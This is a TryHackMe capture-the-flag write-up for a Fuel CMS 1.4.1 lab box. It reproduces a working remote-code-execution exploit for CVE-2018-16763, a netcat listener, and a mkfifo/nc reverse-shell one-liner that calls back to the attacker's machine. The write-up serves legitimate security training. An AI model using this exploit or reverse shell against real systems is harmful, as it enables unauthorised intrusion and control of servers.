tryhackme Vulnerability Capstone writeup

posted on March 5, 2023, 5:51 a.m.

Question 2:
Go to the machine's IP in a browser: http://10.10.187.116
and find out what the name of whatever tool it is
Question 3:
found in same place as question 2
Question 4:
search on exploit-db using the name of tool and choose the one vulnerability "Remote Code Execution (1)"
Question 5:
Question 6: 


((I had to restart the victim machine once to get it to work))


time to exploit. 
create a new py file with the below code, or edit the downloaded py file from exploitdb
change the URL variable to whatever your machine IP is:


# Exploit Title: fuel CMS 1.4.1 - Remote Code Execution (1)
# Date: 2019-07-19
# Exploit Author: 0xd0ff9
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu - Apache2 - php5
# CVE : CVE-2018-16763



import requests
import urllib
URL = 'http://10.'
def find_nth_overlapping(haystack, needle, n):
        print('hererer')
        start = haystack.find(needle)
        while start >= 0 and n > 1:
                start = haystack.find(needle, start+1)
                n -= 1
                return start
while 1:
                xxxx = input('cmd:')
                url = URL+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.parse.quote(xxxx)+"%27%29%2b%27"
                r = requests.get(url)
                html = "<!DOCTYPE html>"
                htmlcharset = r.text.find(html)
                begin = r.text[0:20]
                dup = find_nth_overlapping(r.text,begin,2)
                print(r.text[0:dup])


 


now run:
python3 exploit.py



and you should access, however you need a reverse shell
open another terminal tab and start a nc listener:
nc -vnlp 9001
go back to the original terminal with access into the server and paste this:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.0 9001 >/tmp/f
where 10.0.0.0 is replaced with your attack machine's IP
after that your reverse shell should be operational



go back to the other tab with netcat running and you'll see a new connection and a proper reverse shell


from there do the regular, whoami, ls, and cd into /home/Ubuntu/ to find the flag